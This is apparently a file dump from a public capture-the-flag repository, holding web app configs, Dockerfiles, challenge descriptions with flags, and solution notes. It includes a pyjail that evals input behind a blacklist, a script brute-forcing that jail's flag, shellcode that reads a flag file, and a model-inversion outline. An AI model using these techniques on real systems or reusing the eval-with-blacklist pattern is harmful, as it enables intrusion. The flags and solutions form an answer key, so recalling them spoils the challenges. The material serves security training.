/Challenges/Misc/Shikanoko/dist/next.config.mjs: -------------------------------------------------------------------------------- 1 | /** @type {import('next').NextConfig} */ 2 | const nextConfig = { 3 | output: "export", 4 | // basePath: "/shikanoko-markov-chain", 5 | reactStrictMode: false, 6 | }; 7 | 8 | export default nextConfig; 9 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "shikanoko-markov-chain", 3 | "version": "0.1.0", 4 | "private": true, 5 | "scripts": { 6 | "dev": "next dev", 7 | "build": "next build", 8 | "start": "next start", 9 | "lint": "next lint", 10 | "deploy": "gh-pages -d out -t true --nojekyll" 11 | }, 12 | "dependencies": { 13 | "d3": "^7.9.0", 14 | "next": "14.2.5", 15 | "react": "^18", 16 | "react-dom": "^18", 17 | "react-youtube": "^10.1.0" 18 | }, 19 | "devDependencies": { 20 | "@types/d3": "^7.4.3", 21 | "@types/node": "^20", 22 | "@types/react": "^18", 23 | "@types/react-dom": "^18", 24 | "typescript": "^5" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/Shikanoko/dist/public/favicon.ico -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/public/thumbnail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/Shikanoko/dist/public/thumbnail.png -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/public/vercel.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/src/app/components/Footer.tsx: -------------------------------------------------------------------------------- 1 | export default function Footer() 2 | { 3 | return ( 4 | 9 | ); 10 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/src/app/components/MarkovChain.css: -------------------------------------------------------------------------------- 1 | /* edge */ 2 | .edges 3 | { 4 | stroke: #7d7d7d; 5 | stroke-width: 2px; 6 | fill: none; 7 | } 8 | .edge-labels 9 | { 10 | user-select: none; 11 | text-anchor: middle; 12 | dominant-baseline: middle; 13 | } 14 | 15 | /* node */ 16 | .nodes 17 | { 18 | stroke: none; 19 | fill: #cccccc; 20 | } 21 | 22 | .node 23 | { 24 | cursor: pointer; 25 | } 26 | 27 | .node.current-node 28 | { 29 | fill: rgb(235, 229, 46); 30 | } 31 | 32 | .labels 33 | { 34 | text-anchor: middle; 35 | dominant-baseline: middle; 36 | pointer-events: none; 37 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/src/app/layout.tsx: -------------------------------------------------------------------------------- 1 | import "@app/styles/globals.css"; 2 | import type { Metadata } from "next"; 3 | 4 | export const metadata: Metadata = { 5 | title: "Shikanoko but it's a Markov chain", 6 | description: 'A Markov chain to play the "Shikanoko"', 7 | openGraph: { 8 | images: [ 9 | { 10 | url: "https://nyraa.github.io/shikanoko-markov-chain/thumbnail.png", 11 | width: 1000, 12 | height: 500, 13 | } 14 | ] 15 | } 16 | } 17 | 18 | export default function RootLayout({ 19 | children, 20 | }: { 21 | children: React.ReactNode 22 | }) { 23 | return ( 24 | 25 | {children} 26 | 27 | ) 28 | } 29 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/src/app/styles/globals.css: -------------------------------------------------------------------------------- 1 | body 2 | { 3 | width: 100%; 4 | min-height: 100vh; 5 | margin: 0; 6 | display: flex; 7 | flex-direction: column; 8 | align-items: center; 9 | font-family: sans-serif; 10 | } 11 | footer 12 | { 13 | align-self: flex-start; 14 | margin-top: auto; 15 | padding: 10px; 16 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/dist/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "lib": [ 4 | "dom", 5 | "dom.iterable", 6 | "esnext" 7 | ], 8 | "allowJs": true, 9 | "skipLibCheck": true, 10 | "strict": true, 11 | "noEmit": true, 12 | "esModuleInterop": true, 13 | "module": "esnext", 14 | "moduleResolution": "bundler", 15 | "resolveJsonModule": true, 16 | "isolatedModules": true, 17 | "jsx": "preserve", 18 | "incremental": true, 19 | "paths": { 20 | "@app/*": [ 21 | "./src/app/*" 22 | ] 23 | }, 24 | "plugins": [ 25 | { 26 | "name": "next" 27 | } 28 | ] 29 | }, 30 | "include": [ 31 | "next-env.d.ts", 32 | "**/*.ts", 33 | "**/*.tsx", 34 | ".next/types/**/*.ts" 35 | ], 36 | "exclude": [ 37 | "node_modules" 38 | ] 39 | } 40 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/sol/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sol", 3 | "version": "1.0.0", 4 | "description": "", 5 | "main": "index.js", 6 | "scripts": { 7 | "test": "echo \"Error: no test specified\" && exit 1" 8 | }, 9 | "author": "", 10 | "license": "ISC", 11 | "dependencies": { 12 | "chai": "^5.1.1", 13 | "mocha": "^10.7.0", 14 | "puppeteer": "^22.15.0" 15 | } 16 | } 17 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/.gitignore: -------------------------------------------------------------------------------- 1 | # See https://help.github.com/articles/ignoring-files/ for more about ignoring files. 2 | 3 | # dependencies 4 | /node_modules 5 | /.pnp 6 | .pnp.js 7 | .yarn/install-state.gz 8 | 9 | # testing 10 | /coverage 11 | 12 | # next.js 13 | /.next/ 14 | /out/ 15 | 16 | # production 17 | /build 18 | 19 | # misc 20 | .DS_Store 21 | *.pem 22 | 23 | # debug 24 | npm-debug.log* 25 | yarn-debug.log* 26 | yarn-error.log* 27 | 28 | # local env files 29 | .env*.local 30 | 31 | # vercel 32 | .vercel 33 | 34 | # typescript 35 | *.tsbuildinfo 36 | next-env.d.ts 37 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/README.md: -------------------------------------------------------------------------------- 1 | # Shikanoko but it's a Markov chain 2 | Demo at [here](https://nyraa.github.io/shikanoko-markov-chain/) 3 | 4 | This idea was inspired by this video: 5 | [![thumbnail](https://img.youtube.com/vi/Xkq13ZthmA0/0.jpg)](https://youtu.be/Xkq13ZthmA0) 6 | 7 | ## To run 8 | ``` 9 | npm run dev 10 | # or 11 | yarn dev 12 | # or 13 | pnpm dev 14 | # or 15 | bun dev 16 | ``` 17 | 18 | ## References 19 | - [Markov chain in D3](https://github.com/matheusportela/markov-chain) -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | shikanokonokonoko: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/next.config.mjs: -------------------------------------------------------------------------------- 1 | /** @type {import('next').NextConfig} */ 2 | const nextConfig = { 3 | output: "export", 4 | // basePath: "/shikanoko-markov-chain", 5 | reactStrictMode: false, 6 | }; 7 | 8 | export default nextConfig; 9 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "shikanoko-markov-chain", 3 | "version": "0.1.0", 4 | "private": true, 5 | "scripts": { 6 | "dev": "next dev -p 8000", 7 | "build": "next build", 8 | "start": "next start -p 8000", 9 | "lint": "next lint", 10 | "deploy": "gh-pages -d out -t true --nojekyll" 11 | }, 12 | "dependencies": { 13 | "d3": "^7.9.0", 14 | "next": "14.2.5", 15 | "react": "^18", 16 | "react-dom": "^18", 17 | "react-youtube": "^10.1.0" 18 | }, 19 | "devDependencies": { 20 | "@types/d3": "^7.4.3", 21 | "@types/node": "^20", 22 | "@types/react": "^18", 23 | "@types/react-dom": "^18", 24 | "typescript": "^5" 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/public/favicon.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/Shikanoko/src/public/favicon.ico -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/public/thumbnail.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/Shikanoko/src/public/thumbnail.png -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/public/vercel.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/src/app/components/Footer.tsx: -------------------------------------------------------------------------------- 1 | export default function Footer() 2 | { 3 | return ( 4 | 9 | ); 10 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/src/app/components/MarkovChain.css: -------------------------------------------------------------------------------- 1 | /* edge */ 2 | .edges 3 | { 4 | stroke: #7d7d7d; 5 | stroke-width: 2px; 6 | fill: none; 7 | } 8 | .edge-labels 9 | { 10 | user-select: none; 11 | text-anchor: middle; 12 | dominant-baseline: middle; 13 | } 14 | 15 | /* node */ 16 | .nodes 17 | { 18 | stroke: none; 19 | fill: #cccccc; 20 | } 21 | 22 | .node 23 | { 24 | cursor: pointer; 25 | } 26 | 27 | .node.current-node 28 | { 29 | fill: rgb(235, 229, 46); 30 | } 31 | 32 | .labels 33 | { 34 | text-anchor: middle; 35 | dominant-baseline: middle; 36 | pointer-events: none; 37 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/src/app/layout.tsx: -------------------------------------------------------------------------------- 1 | import "@app/styles/globals.css"; 2 | import type { Metadata } from "next"; 3 | 4 | export const metadata: Metadata = { 5 | title: "Shikanoko but it's a Markov chain", 6 | description: 'A Markov chain to play the "Shikanoko"', 7 | openGraph: { 8 | images: [ 9 | { 10 | url: "https://nyraa.github.io/shikanoko-markov-chain/thumbnail.png", 11 | width: 1000, 12 | height: 500, 13 | } 14 | ] 15 | } 16 | } 17 | 18 | export default function RootLayout({ 19 | children, 20 | }: { 21 | children: React.ReactNode 22 | }) { 23 | return ( 24 | 25 | {children} 26 | 27 | ) 28 | } 29 | -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/src/app/styles/globals.css: -------------------------------------------------------------------------------- 1 | body 2 | { 3 | width: 100%; 4 | min-height: 100vh; 5 | margin: 0; 6 | display: flex; 7 | flex-direction: column; 8 | align-items: center; 9 | font-family: sans-serif; 10 | } 11 | footer 12 | { 13 | align-self: flex-start; 14 | margin-top: auto; 15 | padding: 10px; 16 | } -------------------------------------------------------------------------------- /Challenges/Misc/Shikanoko/src/tsconfig.json: -------------------------------------------------------------------------------- 1 | { 2 | "compilerOptions": { 3 | "lib": [ 4 | "dom", 5 | "dom.iterable", 6 | "esnext" 7 | ], 8 | "allowJs": true, 9 | "skipLibCheck": true, 10 | "strict": true, 11 | "noEmit": true, 12 | "esModuleInterop": true, 13 | "module": "esnext", 14 | "moduleResolution": "bundler", 15 | "resolveJsonModule": true, 16 | "isolatedModules": true, 17 | "jsx": "preserve", 18 | "incremental": true, 19 | "paths": { 20 | "@app/*": [ 21 | "./src/app/*" 22 | ] 23 | }, 24 | "plugins": [ 25 | { 26 | "name": "next" 27 | } 28 | ] 29 | }, 30 | "include": [ 31 | "next-env.d.ts", 32 | "**/*.ts", 33 | "**/*.tsx", 34 | ".next/types/**/*.ts" 35 | ], 36 | "exclude": [ 37 | "node_modules" 38 | ] 39 | } 40 | -------------------------------------------------------------------------------- /Challenges/Misc/castingspells/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Casting Spells 2 | author: scuffed 3 | category: misc 4 | description: "Frieren: 'Why did you enable `VisualHostKey`?'\nHeiter:'It's what Himmel the hero would have done.'\nMake the spells collide!" 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{impr3ss1ve_m4na_f3rn} 13 | 14 | connection_info: nc hostname 8000 15 | 16 | state: visible 17 | version: "0.1" 18 | -------------------------------------------------------------------------------- /Challenges/Misc/castingspells/solution.md: -------------------------------------------------------------------------------- 1 | this is a direct implementation of the drunken bishop randomart algorithm used by openssh (http://www.dirk-loss.de/sshvis/drunken_bishop.pdf), and since the fingerprint is given, you just find a cycle in the walk and submit that. 2 | 3 | if challenge becomes too confusing to interact with, partial source will be provided. 4 | 5 | flag: `blahaj{impr3ss1ve_m4na_f3rn}` -------------------------------------------------------------------------------- /Challenges/Misc/castingspells/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.12-slim 3 | 4 | RUN apt update && apt install -y socat 5 | 6 | # switch working directory 7 | WORKDIR /app 8 | 9 | # install the dependencies and packages in the requirements file 10 | RUN pip install numpy 11 | 12 | # copy every content from the local file to the image 13 | COPY . /app 14 | 15 | ENTRYPOINT ["sh"] 16 | CMD [ "/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Misc/castingspells/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | castingspells: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Misc/castingspells/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m python3 /app/main.py" -------------------------------------------------------------------------------- /Challenges/Misc/jigsawpuzzle/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Jigsaw Puzzle 2 | author: treeindustry 3 | category: misc 4 | description: | 5 | Dear Haj, 6 | 7 | How have your holidays been? If you have no plans for New Year's Eve, 8 | would you like to join us? All of our friends will be there. It will 9 | be a fun party! Here is the location: 10 | https://docs.google.com/presentation/d/12PRILGsZBu3irFufoidmHN5uQXi9Uyzj5vvKqzChnfM 11 | 12 | 13 | flags: 14 | - blahaj{h4PpY_nEw_y3aR_My_Fr13ND} 15 | -------------------------------------------------------------------------------- /Challenges/Misc/jigsawpuzzle/dist/puzzle.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/jigsawpuzzle/dist/puzzle.png -------------------------------------------------------------------------------- /Challenges/Misc/jigsawpuzzle/sol/part1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/jigsawpuzzle/sol/part1.png -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Model Answer 2 | author: fern 3 | category: misc 4 | description: Heard AI is very popular these days... so I trained my very own AI to protect my servers! And since we all know no human can understand model weights, you can even have the weights I used for my AI! Try and hack me now! 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{v3Ry_1nTeL1igEnT_A1} 13 | 14 | files: 15 | - dist/server.py 16 | - dist/ai.h5 17 | 18 | connection_info: nc hostname 8000 19 | 20 | state: visible 21 | version: "0.1" 22 | -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/dist/ai.h5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/modelanswer/dist/ai.h5 -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/solution.md: -------------------------------------------------------------------------------- 1 | # Solution 2 | 3 | Solve script in `solve/`. -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/solve/ai.h5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/modelanswer/solve/ai.h5 -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/src/Dockerfile: -------------------------------------------------------------------------------- 1 | # start by pulling the python image 2 | FROM python:3.11-slim-bookworm 3 | 4 | RUN apt update && apt install -y socat 5 | 6 | # copy the requirements file into the image 7 | COPY ./requirements.txt /app/requirements.txt 8 | 9 | # switch working directory 10 | WORKDIR /app 11 | 12 | # install the dependencies and packages in the requirements file 13 | RUN pip install -r requirements.txt 14 | 15 | # copy every content from the local file to the image 16 | COPY . /app 17 | 18 | RUN adduser --uid 1001 --disabled-password nonroot 19 | USER 1001 20 | 21 | ENTRYPOINT ["sh"] 22 | CMD [ "/app/entry.sh" ] -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/src/ai.h5: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/modelanswer/src/ai.h5 -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | modelanswer: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m python3 /app/chal.py" -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer/src/requirements.txt: -------------------------------------------------------------------------------- 1 | tensorflow 2 | numpy -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer2/dist/models.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/modelanswer2/dist/models.zip -------------------------------------------------------------------------------- /Challenges/Misc/modelanswer2/solution.md: -------------------------------------------------------------------------------- 1 | A model inversion challenge. 2 | Solution code in `soln/` 3 | Concept: 4 | 1. Attach another model to the inputs of the original model 5 | 2. Freeze the params of the original model 6 | 3. Train the attacker model to generate sth that makes original model say "ok accepted" 7 | 4. Remove the original model, get outputs of attacker model, and you can see the image used to train 8 | 5. Repeat for all 6 numbers, great success 9 | 10 | Flag: `blahaj{246748}` -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/challenge.yml: -------------------------------------------------------------------------------- 1 | name: One Call Away 2 | author: jiajie 3 | category: misc 4 | description: Here's an extremely simple pyjail, where the flag is just one print() call away. 5 | 6 | Wait, who swapped the last 2 lines? 7 | 8 | value: 500 9 | type: dynamic 10 | decay: 40 11 | minimum: 100 12 | 13 | flags: 14 | - blahaj{3x1t_h4nDl3r} 15 | 16 | files: 17 | - dist/jail.py 18 | 19 | connection_info: nc hostname 5000 20 | 21 | state: visible 22 | version: "0.1" 23 | -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/dist/jail.py: -------------------------------------------------------------------------------- 1 | import threading 2 | del threading 3 | 4 | blacklist = [ 5 | '__dict__', 6 | 'exec', 7 | 'eval', 8 | 'breakpoint', 9 | 'open', 10 | 'license', 11 | 'copyright', 12 | 'credits', 13 | ] 14 | 15 | if __name__ == '__main__': 16 | code = input('> ') 17 | 18 | assert code.isascii(), 'Nope' 19 | assert all(word not in code for word in blacklist), 'Nope' 20 | assert code.count('(') <= 1, 'This is a simple pyjail, you only need one call!' 21 | 22 | eval(code) 23 | flag = open('flag.txt').read() 24 | 25 | -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/solve/s.py: -------------------------------------------------------------------------------- 1 | from string import ascii_letters, digits 2 | from pwn import * 3 | 4 | context.log_level = 'error' 5 | 6 | space = ascii_letters + digits + '_{}' 7 | 8 | flag = '' 9 | while not flag.endswith('}'): 10 | for c in space: 11 | t = remote('localhost', 5000) 12 | t.sendlineafter('> ', f'setattr(__builtins__, "reversed", lambda a: flag[{len(flag)}] == "{c}" or 1/0)') 13 | output = t.recvall() 14 | if b'ZeroDivisionError' not in output: 15 | flag += c 16 | print(flag) 17 | break 18 | 19 | -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/src/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.11-slim 2 | WORKDIR /app 3 | 4 | RUN useradd -m ctfuser 5 | RUN apt update 6 | RUN apt install -y socat 7 | 8 | COPY . /app 9 | RUN chmod -R 555 /app 10 | 11 | USER ctfuser 12 | 13 | ENTRYPOINT ["sh"] 14 | CMD [ "/app/entry.sh" ] 15 | -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/src/entry.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | socat TCP-LISTEN:8000,nodelay,reuseaddr,fork EXEC:"timeout -s KILL 10m python3 /app/jail.py",stderr -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{3x1t_h4nDl3r} 2 | -------------------------------------------------------------------------------- /Challenges/Misc/one_call_away/src/jail.py: -------------------------------------------------------------------------------- 1 | import threading 2 | del threading 3 | 4 | blacklist = [ 5 | '__dict__', 6 | 'exec', 7 | 'eval', 8 | 'breakpoint', 9 | 'open', 10 | 'license', 11 | 'copyright', 12 | 'credits', 13 | ] 14 | 15 | if __name__ == '__main__': 16 | code = input('> ') 17 | 18 | assert code.isascii(), 'Nope' 19 | assert all(word not in code for word in blacklist), 'Nope' 20 | assert code.count('(') <= 1, 'This is a simple pyjail, you only need one call!' 21 | 22 | eval(code) 23 | flag = open('flag.txt').read() 24 | 25 | -------------------------------------------------------------------------------- /Challenges/Misc/scanme/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "scan me!" 2 | author: "scuffed" 3 | category: misc 4 | description: it's in the name, dude. 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | files: 12 | - dist/image.png 13 | 14 | flags: 15 | - blahaj{QR4ZY_R3P41R} 16 | 17 | state: visible 18 | 19 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Misc/scanme/dist/image.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/scanme/dist/image.png -------------------------------------------------------------------------------- /Challenges/Misc/scanme/solution.md: -------------------------------------------------------------------------------- 1 | Literally just repair the QR code. takes maybe 10-15 minutes. 2 | 3 | Flag: `blahaj{QR4ZY_R3P41R}` -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/challenge.yml: -------------------------------------------------------------------------------- 1 | name: shellcraft shenanigans 2 | author: FS 3 | category: pwn 4 | description: | 5 | > How well do you know about C system calls? (Note: flag is stored in /home/ctfuser/challenge/flag.txt) 6 | 7 | flags: 8 | - blahaj{5h0u1d_h4v3_u53d_4_wh174l157_1ns734d_0f_4_bl4ckl157} 9 | 10 | -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/dist/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/shellcraft_shenanigans/dist/chall -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/sol.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/solve/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #p=process("../dist/./chall") 4 | p=remote("127.0.0.1","1337") 5 | #gdb.attach(p) 6 | context(os='linux',arch='amd64') 7 | context.log_level='DEBUG' 8 | 9 | payload=shellcraft.openat(-1,"/home/ctfuser/challenge/flag.txt") 10 | payload+=shellcraft.sendfile(1,'rax',0,4096) 11 | 12 | p.sendline(asm(payload)) 13 | 14 | p.interactive() 15 | -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/src/chall: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Misc/shellcraft_shenanigans/src/chall -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | shellcraftshenanigans: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Misc/shellcraft_shenanigans/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{5h0u1d_h4v3_u53d_4_wh174l157_1ns734d_0f_4_bl4ckl157} 2 | -------------------------------------------------------------------------------- /Challenges/Osint/README.md: -------------------------------------------------------------------------------- 1 | Osint Challenges -------------------------------------------------------------------------------- /Challenges/Osint/bad coder/challenge.yml: -------------------------------------------------------------------------------- 1 | name: "bad coder" 2 | author: "scuffed" 3 | category: osint 4 | description: "My friend is learning to code but I think he's pretty bad at it. I've been trying to catch him lacking, maybe some poorly written code or something... all I've got is a username: `yattana_yattana`. Don't even know what it's for, can you help me out?" 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{c4r3fuL_w17h_y0UR_c0MM175} 13 | 14 | state: visible 15 | 16 | version: "0.1" -------------------------------------------------------------------------------- /Challenges/Osint/bad coder/solution.md: -------------------------------------------------------------------------------- 1 | Find twitter account, then github account. Go to the right branch of the sole repo and find .env commit. 2 | 3 | Flag: `blahaj{c4r3fuL_w17h_y0UR_c0MM175}` -------------------------------------------------------------------------------- /Challenges/Osint/mrt/challenge.yml: -------------------------------------------------------------------------------- 1 | name: MRT 2 | author: hartmannsyg 3 | category: osint 4 | description: Help I am stuck in the MRT? Which station am I in? Flag format is `blahaj{mrt_name_in_lowercase}`. Replace spaces with underscores. Leave dashes as is. 5 | 6 | value: 500 7 | type: dynamic 8 | decay: 40 9 | minimum: 100 10 | 11 | flags: 12 | - blahaj{dover} 13 | -------------------------------------------------------------------------------- /Challenges/Osint/mrt/dist/mrt.jpg: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Osint/mrt/dist/mrt.jpg -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/challenge.yml: -------------------------------------------------------------------------------- 1 | name: 2 wrongs dont make a right 2 | author: FS 3 | category: pwn 4 | description: | 5 | > My friend recently told me 2 wrongs don't make a right but I think that's wrong. Prove me wrong. (Note: the value in a certain local variable on the stack can be different on the remote server but please don't bruteforce the value against the remote server) 6 | 7 | flags: 8 | - blahaj{i_gUes3_i_w@s_wR0ng} 9 | -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/dist/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/dist/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/dist/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/dist/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/dist/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/dist/vuln -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/irrelevant/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/irrelevant/vuln -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/buildx: -------------------------------------------------------------------------------- 1 | Not Found -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/docker-compose.yml: -------------------------------------------------------------------------------- 1 | services: 2 | 2wdmar: 3 | privileged: false 4 | build: . 5 | ports: 6 | - "8000:8000" 7 | -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/flag.txt: -------------------------------------------------------------------------------- 1 | blahaj{i_gUes3_i_w@s_wR0ng} 2 | -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/src/ld-linux-x86-64.so.2 -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/libc.so.6: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/src/libc.so.6 -------------------------------------------------------------------------------- /Challenges/Pwn/2wrongsDontMakeARight/src/vuln: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/2wrongsDontMakeARight/src/vuln -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/challenge.yml: -------------------------------------------------------------------------------- 1 | name: Feedback Service 2 | author: FS 3 | category: pwn 4 | description: | 5 | > You ever heard of the book "To kill a mockingbird"? What about to kill a canary? 6 | 7 | flags: 8 | - blahaj{canary_master_101} 9 | -------------------------------------------------------------------------------- /Challenges/Pwn/Feedback Simulator/dist/ld-linux-x86-64.so.2: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/blahajctf/blahajctf24-public/2428d072b7b59902547711d75facbb16994fcfec/Challenges/Pwn/Feedback 